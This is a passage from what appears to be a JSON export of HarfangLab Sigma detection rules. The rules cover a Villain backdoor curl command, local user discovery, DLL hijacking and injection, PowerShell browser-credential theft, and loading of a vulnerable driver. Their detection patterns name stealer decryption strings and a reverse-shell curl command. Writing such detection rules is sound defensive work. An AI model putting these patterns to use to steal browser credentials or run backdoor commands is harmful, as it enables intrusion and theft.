"content": "title: Suspicious Curl Execution Related to Villain Backdoor\nid: c29f3873-fe52-4a98-9051-07fafddf1237\ndescription: |\n Detects a suspicious curl execution that may be related to the Villain framework's backdoor.\n This backdoor allows users to instantiate reverse shells on the victim's computer and communcate with other \"sibling machines\" (machines infected by Villain) in the network.\n Attackers often use reverse shells to bypass firewall restrictions.\n It is recommended to investigate this curl command and to block connections to the target IP in the command-line. If the IP is local to your network you may correlate it with other alerts to determine compromised endpoints in your network.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://github.com/t3l3machus/Villain\n - https://attack.mitre.org/techniques/T1059/004/\ndate: 2022/12/06\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Framework.Villain\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/curl'\n CommandLine: 'curl -s http://*.*.*.*:*/????????/*/* -H Authorization: ????????-????????-???????? -o /dev/null'\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c29f3873-fe52-4a98-9051-07fafddf1237",
"rule_name": "Suspicious Curl Execution Related to Villain Backdoor",
"rule_description": "Detects a suspicious curl execution that may be related to the Villain framework's backdoor.\nThis backdoor allows users to instantiate reverse shells on the victim's computer and communicate with other \"sibling machines\" (machines infected by Villain) in the network.\nAttackers often use reverse shells to bypass firewall restrictions.\nIt is recommended to investigate this curl command and to block connections to the target IP in the command-line. If the IP is local to your network you may correlate it with other alerts to determine compromised endpoints in your network.\n",
"rule_creation_date": "2022-12-06",
"rule_modified_date": "2025-02-13",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c2a9ecc2-ad4c-41d3-8eed-baa411f1c978",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621375Z",
"creation_date": "2026-03-23T11:45:34.621377Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621381Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1087/001/"
],
"name": "t1087_001_net_user_local.yml",
"content": "title: Local User List Discovered\nid: c2a9ecc2-ad4c-41d3-8eed-baa411f1c978\ndescription: |\n Detects the execution of the net command to discover users.\n This command is often used attackers during the discovery phase to gather the list of local users.\n It is recommended to check the process' parent for other suspicious actions.\nreferences:\n - https://attack.mitre.org/techniques/T1087/001/\ndate: 2021/04/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_cmd:\n CommandLine|contains: ' user'\n\n # This is handled by another rule\n filter_cmd:\n CommandLine|contains:\n - '/domain'\n - '\\domain'\n - '/add'\n - '\\add'\n - '/delete'\n - '/del'\n - '\\delete'\n - '/ACTIVE'\n - '\\ACTIVE'\n\n exclusion_programfiles:\n GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '?:\\Program Files\\NSClient++\\nscp.exe'\n - '?:\\Program Files (x86)\\\\*\\winpty-agent.exe'\n - '?:\\Program Files (x86)\\CyberCNSAgent\\cybercnsagent.exe'\n - '?:\\Windows\\AdminArsenal\\PDQDeployRunner\\service-?\\PDQDeployRunner-?.exe'\n - '?:\\Program Files\\BMC Software\\BladeLogic\\RSC\\RSCD.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n - '?:\\Program Files\\Siemens\\syngo\\bin\\syngo.Common.Starter.exe'\n - '?:\\Program Files\\Quest\\KACE\\KDeploy.exe'\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\Program Files\\pandora_agent\\util\\pandora_hardening.exe'\n\n exclusion_ivanti:\n # LANDESK 
Shavlik Protect Agent\n CommandLine: '?:\\windows\\system32\\net1 user administrator'\n GrandparentCommandLine: '?:\\windows\\system32\\cmd.exe /c net user administrator | findstr /C:Account active 2>>?:\\STscript\\Trace.txt'\n\n exclusion_kiosk:\n CommandLine: '?:\\windows\\system32\\net1 user kiosk 1364146620'\n GrandparentImage: '?:\\Windows\\System32\\LogonUI.exe'\n\n exclusion_connectwise:\n ParentImage: '?:\\Windows\\LTSvc\\LTSVC.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Connectwise, LLC'\n\n exclusion_archimed:\n GrandparentCommandLine: '?:\\Windows\\Microsoft.NET\\Framework\\v*\\installutil.exe /i ArchimedUpdater.exe'\n\n exclusion_schedule:\n ProcessParentGrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c2a9ecc2-ad4c-41d3-8eed-baa411f1c978",
"rule_name": "Local User List Discovered",
"rule_description": "Detects the execution of the net command to discover users.\nThis command is often used by attackers during the discovery phase to gather the list of local users.\nIt is recommended to check the process' parent for other suspicious actions.\n",
"rule_creation_date": "2021-04-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c2bb32cf-f1c3-400b-8a28-fd5910538098",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602791Z",
"creation_date": "2026-03-23T11:45:34.602794Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602802Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wermgr.yml",
"content": "title: DLL Hijacking via wermgr.exe\nid: c2bb32cf-f1c3-400b-8a28-fd5910538098\ndescription: |\n Detects potential Windows DLL Hijacking via wermgr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wermgr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c2bb32cf-f1c3-400b-8a28-fd5910538098",
"rule_name": "DLL Hijacking via wermgr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wermgr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c2ebbac9-31dc-4e9c-abb3-40df63d524a2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086076Z",
"creation_date": "2026-03-23T11:45:34.086078Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086082Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_dll_injection_via_remote_debugging.yml",
"content": "title: Possible DLL Injected via Remote Debugging\nid: c2ebbac9-31dc-4e9c-abb3-40df63d524a2\ndescription: |\n Detects the suspicious loading of a DLL in a process with a stacktrace indicating debugging activity.\n Attackers may try to inject malicious code into a remote process to evade process based defenses.\n It is recommended to analyze the behavior of both the parent and child processes to look for malicious actions or content.\nreferences:\n - https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/08/25\nmodified: 2025/08/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n StackTrace|startswith: '?:\\Windows\\System32\\ntdll.dll!DbgUiRemoteBreakin'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c2ebbac9-31dc-4e9c-abb3-40df63d524a2",
"rule_name": "Possible DLL Injected via Remote Debugging",
"rule_description": "Detects the suspicious loading of a DLL in a process with a stacktrace indicating debugging activity.\nAttackers may try to inject malicious code into a remote process to evade process based defenses.\nIt is recommended to analyze the behavior of both the parent and child processes to look for malicious actions or content.\n",
"rule_creation_date": "2025-08-25",
"rule_modified_date": "2025-08-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c31922b9-cce9-40eb-84c9-1670f46cdbe5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611503Z",
"creation_date": "2026-03-23T11:45:34.611506Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611514Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/cyberscribers-exploring-cybersecurity/apt28-from-initial-damage-to-domain-controller-threats-in-an-hour-cert-ua-8399-1944dd6edcdf",
"https://www.magnetforensics.com/blog/infostealer-malware-what-is-it-and-how-to-investigate/",
"https://e.cyberint.com/hubfs/Cyberint%20Info%20Stealers%20Overview.pdf",
"https://attack.mitre.org/techniques/T1005/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1005_pwsh_browser_data_accessed.yml",
"content": "title: Suspicious Browser Data Read via PowerShell\nid: c31922b9-cce9-40eb-84c9-1670f46cdbe5\ndescription: |\n Detects a suspicious PowerShell script with the capacity to read and decrypt browser data files.\n This may be an indicator of a stealer opening the User Data folder of a given browser to exfiltrate credentials or other artifacts.\n It is recommended to investigate the context of this action to determine its legitimacy.\n If you assume this to be a breach, it is recommended to perform an investigation to determine what information has been exfiltrated and change the credentials of the affected users.\n Further information about different stealers and scripts is present in the references.\nreferences:\n - https://medium.com/cyberscribers-exploring-cybersecurity/apt28-from-initial-damage-to-domain-controller-threats-in-an-hour-cert-ua-8399-1944dd6edcdf\n - https://www.magnetforensics.com/blog/infostealer-malware-what-is-it-and-how-to-investigate/\n - https://e.cyberint.com/hubfs/Cyberint%20Info%20Stealers%20Overview.pdf\n - https://attack.mitre.org/techniques/T1005/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/01/09\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - attack.t1185\n - attack.discovery\n - attack.t1217\n - attack.privilege_escalation\n - attack.t1555.003\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Stealer.Generic\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_chromium:\n PowershellCommand|contains|all:\n - 'os_crypt.encrypted_key' # Encrypted key in Local State .json\n - 'AppData\\Local\\\\*\\User Data' # Login Data location\n\n selection_firefox:\n PowershellCommand|contains|all:\n - '\\Profiles' # key3.db|key4.db location for use with NSS\n - 
'encryptedPassword' # logins.json field\n - 'PK11SDR_Decrypt' # nss3.dll decryption function\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c31922b9-cce9-40eb-84c9-1670f46cdbe5",
"rule_name": "Suspicious Browser Data Read via PowerShell",
"rule_description": "Detects a suspicious PowerShell script with the capacity to read and decrypt browser data files.\nThis may be an indicator of a stealer opening the User Data folder of a given browser to exfiltrate credentials or other artifacts.\nIt is recommended to investigate the context of this action to determine its legitimacy.\nIf you assume this to be a breach, it is recommended to perform an investigation to determine what information has been exfiltrated and change the credentials of the affected users.\nFurther information about different stealers and scripts is present in the references.\n",
"rule_creation_date": "2024-01-09",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.discovery",
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1005",
"attack.t1059.001",
"attack.t1185",
"attack.t1217",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c36093ec-d58a-4550-a890-21bcfcf9011f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603062Z",
"creation_date": "2026-03-23T11:45:34.603066Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603073Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://ss64.com/nt/net-config.html",
"https://attack.mitre.org/techniques/T1016/"
],
"name": "t1016_net_config_workstation.yml",
"content": "title: Workstation Service Configuration Enumerated via net.exe\nid: c36093ec-d58a-4550-a890-21bcfcf9011f\ndescription: |\n Detects the execution of net command to display various information about the host.\n This command is especially used to display information about the local workstation such as current user or computer name.\n Attackers can use this program to perform discovery.\n It is recommended to investigate the parent process for other suspicious behaviors.\nreferences:\n - https://ss64.com/nt/net-config.html\n - https://attack.mitre.org/techniques/T1016/\ndate: 2024/02/22\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'net1.exe'\n CommandLine|contains: ' config work'\n\n exclusion_swift:\n GrandparentImage: '?:\\Program Files\\SWIFT\\Swift Token Client\\checkhost\\scripts\\perl.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c36093ec-d58a-4550-a890-21bcfcf9011f",
"rule_name": "Workstation Service Configuration Enumerated via net.exe",
"rule_description": "Detects the execution of the net command to display various information about the host.\nThis command is especially used to display information about the local workstation such as the current user or computer name.\nAttackers can use this program to perform discovery.\nIt is recommended to investigate the parent process for other suspicious behaviors.\n",
"rule_creation_date": "2024-02-22",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c3fe1e99-e4f4-4e8e-b7c7-b3003eee67e7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624934Z",
"creation_date": "2026-03-23T11:45:34.624936Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624940Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cybereason.com/blog/behind-closed-doors-the-rise-of-hidden-malicious-remote-access",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_cvtres.yml",
"content": "title: Cvtres.exe Sacrificial Process Spawned\nid: c3fe1e99-e4f4-4e8e-b7c7-b3003eee67e7\ndescription: |\n Detects the suspicious execution of the legitimate cvtres.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n It is recommended to investigate the parent process performing this action and the destination IP address of the cvtres.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://www.cybereason.com/blog/behind-closed-doors-the-rise-of-hidden-malicious-remote-access\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/11/12\nmodified: 2025/12/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\cvtres.exe'\n\n filter_cmd:\n CommandLine|contains: ' '\n\n filter_winsxs:\n Image:\n - '?:\\Windows\\WinSxS\\x86_*-cvtres_*\\cvtres.exe'\n - '?:\\Windows\\WinSxS\\amd64_*-cvtres_*\\cvtres.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c3fe1e99-e4f4-4e8e-b7c7-b3003eee67e7",
"rule_name": "Cvtres.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate cvtres.exe Windows binary, spawned without arguments. This can mean that the binary is being used as a sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the cvtres.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2025-11-12",
"rule_modified_date": "2025-12-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c4147702-b07a-45c6-ab0c-80a8f3001000",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085370Z",
"creation_date": "2026-03-23T11:45:34.085372Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085377Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/ph4nt0mbyt3/Darkside",
"https://www.adlice.com/fr/roguekiller/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_byovd_truesight_darkside_load.yml",
"content": "title: Adlice Vulnerable Driver Loaded\nid: c4147702-b07a-45c6-ab0c-80a8f3001000\ndescription: |\n Detects the loading of a known vulnerable Adlice Software driver in an unusual context.\n This likely indicates the driver has been deployed by a malicious actor for exploitation.\n This technique is usually called BYOVD (Bring Your Own Vulnerable Driver).\n It is recommended to check if the process that loaded the driver is a legitimate one from Adlice Software.\nreferences:\n - https://github.com/ph4nt0mbyt3/Darkside\n - https://www.adlice.com/fr/roguekiller/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2023/11/30\nmodified: 2025/09/08\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1068\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.VulnerableDriver\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: driver_load\ndetection:\n selection_exact:\n DriverSha256: 'bfc2ef3b404294fe2fa05a8b71c7f786b58519175b7202a69fe30f45e607ff1c'\n\n selection_by_desc:\n Company: 'Adlice Software'\n InternalName: 'Truesight'\n OriginalFileName: 'Truesight'\n ProductVersion|re:\n - '^3\\.[0-3](?:\\.\\d+)?$' # > 3.0, <= 3.3.?\n - '^2\\.0\\.2$' # == 2.0.2\n Signed: 'true'\n SignatureStatus: 'Valid'\n\n filter_legitimate_uses:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\drivers\\'\n - '?:\\Windows\\System32\\DriverStore\\FileRepository\\'\n - '?:\\Windows\\System32\\spool\\drivers\\'\n - '?:\\Windows\\WinSxS\\'\n ImageLoaded|endswith: '\\truesight.sys'\n\n condition: 1 of selection_* and not 1 of filter_*\nfalsepositives:\n - Some unidentified legitimate software might deploy and rely on the vulnerable driver as well.\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c4147702-b07a-45c6-ab0c-80a8f3001000",
"rule_name": "Adlice Vulnerable Driver Loaded",
"rule_description": "Detects the loading of a known vulnerable Adlice Software driver in an unusual context.\nThis likely indicates the driver has been deployed by a malicious actor for exploitation.\nThis technique is usually called BYOVD (Bring Your Own Vulnerable Driver).\nIt is recommended to check if the process that loaded the driver is a legitimate one from Adlice Software.\n",
"rule_creation_date": "2023-11-30",
"rule_modified_date": "2025-09-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c456e152-cc03-4950-9835-a23e13694f56",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590716Z",
"creation_date": "2026-03-23T11:45:34.590719Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590727Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_charmap.yml",
